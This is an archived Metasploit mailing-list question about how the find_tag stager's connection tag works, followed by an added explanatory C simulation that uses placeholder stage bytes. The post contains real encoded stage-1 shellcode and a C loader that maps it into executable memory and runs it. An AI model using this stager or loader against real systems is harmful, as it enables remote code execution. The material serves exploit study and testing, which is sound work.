Metasploit mailing list archives
Understanding Find Tag shellcode
From: cr01nk zer0 <cr01nk () gmail com>
Date: Mon, 23 Nov 2009 02:02:00 -0500
Hi, could anybody help me in understanding the find_tag class of shellcodes? How do I find the 4-byte connection tag (I think that the first 119-byte shellcode is implementing a connection tag), and how do I implement it in shellcode testing code?

===================================================================================================

#include <stdio.h>
#include <string.h>
#include <windows.h>

/*
 * windows/upexec/find_tag - 119 bytes (stage 1)
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * TAG=0BoU, EXITFUNC=thread,
 * PEXEC=c:\windows\system32\calc.exe
 */
unsigned char buf[] =
"\x33\xc9\xb1\x18\xbf\xed\xc2\xfb\x72\xdb\xc3\xd9\x74\x24\xf4"
"\x5d\x31\x7d\x0e\x03\x7d\x0e\x83\x28\xc6\x19\x87\x4e\xf4\x22"
"\x0c\x25\xbc\xec\x46\x79\x4f\x86\x01\x65\xc4\x83\x3a\xe6\xfa"
"\x1e\x91\x46\xf8\x66\xd7\x64\xcd\x39\x15\xfd\xde\x4d\x32\xf5"
"\xab\x17\xf9\x8e\xe0\x92\x79\x1b\xb4\x91\x65\x90\x19\x83\xa9"
"\xa5\x7c\xd0\xbd\x80\x5a\x80\x5b\x95\x29\xda\xf2\x71\x51\x45"
"\xff\xc1\xfa\x76\x2a\x6c\x81\x49\xa1\x80\x13\x1b\xfc\x50\x76"
"\xca\x57\x97\xa5\x5f\x6a\x57\x08\xcf\xc0\xe2\x51\xf0\x0d";

int main(void)
{
    void (*c0de)(void);

    printf("Stager Shellcode Test\n");

    /* buf lives in a non-executable data section when DEP is on, so copy
     * the stager into a page explicitly mapped RWX before jumping to it. */
    void *mem = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    if (mem == NULL) {
        printf("VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    memcpy(mem, buf, sizeof(buf));

    /* Cast the RWX buffer to a function pointer and run the stager. */
    c0de = (void (*)(void))mem;
    c0de();
    return 0;
}
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
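As an added illustration of what a find_tag stager does (this is example code written for this page, not the original post's code and not Metasploit's stager source): the 119 bytes listed above are only stage 1. The handler that accepts the connection sends the 4-byte tag (TAG=0BoU in the payload comment) followed by the stage, and the stager locates that connection from inside the process by walking its socket descriptors and checking the first 4 bytes pending on each one for the tag. The C below models that search on POSIX with a socketpair standing in for the victim's network socket; the scan range, the use of MSG_PEEK and MSG_DONTWAIT (so the tag is not consumed and idle sockets do not block), the fd upper bound, and the "stage" bytes are my choices and constructed placeholders, and the real stager's framing of the stage after the tag may differ.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>

/* Tag from the payload comment on this page (TAG=0BoU), exactly 4 bytes. */
static const char TAG[4] = "0BoU";

/* Assumed upper bound for the descriptor scan (a choice for this example). */
#define MAX_FD 1024

/* Walk descriptors 0..max_fd-1 and return the first one whose pending data
 * begins with the 4-byte tag. MSG_PEEK leaves the bytes in place so a
 * non-matching socket is untouched; MSG_DONTWAIT avoids blocking on idle
 * sockets. Non-socket descriptors simply fail recv() and are skipped. */
int find_tag_fd(const char tag[4], int max_fd)
{
    for (int fd = 0; fd < max_fd; fd++) {
        char peek[4];
        ssize_t n = recv(fd, peek, sizeof peek, MSG_PEEK | MSG_DONTWAIT);
        if (n == 4 && memcmp(peek, tag, 4) == 0)
            return fd;
    }
    return -1;
}

/* Consume the tag on the tagged socket and drain whatever stage bytes are
 * already queued behind it. Returns the stage length, or -1 on error. */
ssize_t read_stage(int fd, unsigned char *stage, size_t cap)
{
    char tag[4];
    if (recv(fd, tag, sizeof tag, 0) != 4)
        return -1;
    ssize_t total = 0;
    while ((size_t)total < cap) {
        ssize_t n = recv(fd, stage + total, cap - (size_t)total, MSG_DONTWAIT);
        if (n <= 0)
            break;
        total += n;
    }
    return total;
}

/* Simulate both ends: the "handler" end writes TAG + stage, then the stager
 * side searches for the tagged descriptor and reads the stage back.
 * Returns the stage length on success, a negative code on failure. */
int demo(void)
{
    int sv[2];
    unsigned char stage[64];
    /* Constructed placeholder for the stage; not real shellcode. */
    const unsigned char fake_stage[] = { 0xcc, 0xcc, 0xc3 };

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return -1;
    int handler = sv[0], victim = sv[1];

    /* Handler side: tag first, then the stage. */
    if (send(handler, TAG, 4, 0) != 4 ||
        send(handler, fake_stage, sizeof fake_stage, 0) != (ssize_t)sizeof fake_stage) {
        close(handler); close(victim);
        return -1;
    }

    /* Stager side: the handler end has nothing pending, so only the victim
     * end should match the tag. */
    int fd = find_tag_fd(TAG, MAX_FD);
    if (fd != victim) {
        close(handler); close(victim);
        return -2;
    }

    ssize_t n = read_stage(fd, stage, sizeof stage);
    close(handler); close(victim);
    if (n != (ssize_t)sizeof fake_stage || memcmp(stage, fake_stage, (size_t)n) != 0)
        return -3;
    return (int)n;
}

int main(void)
{
    int n = demo();
    if (n < 0) {
        printf("find_tag demo failed: %d\n", n);
        return 1;
    }
    printf("tagged socket found, %d stage bytes read\n", n);
    return 0;
}
```

The point for a test harness like the one in the post: the stager has nothing to find unless a socket exists in the process with the tag already queued on it, so a standalone run of the 119 bytes with no connection will not reach the stage. A working test either connects to a Metasploit handler for the same payload or supplies a socket in-process the way demo() does.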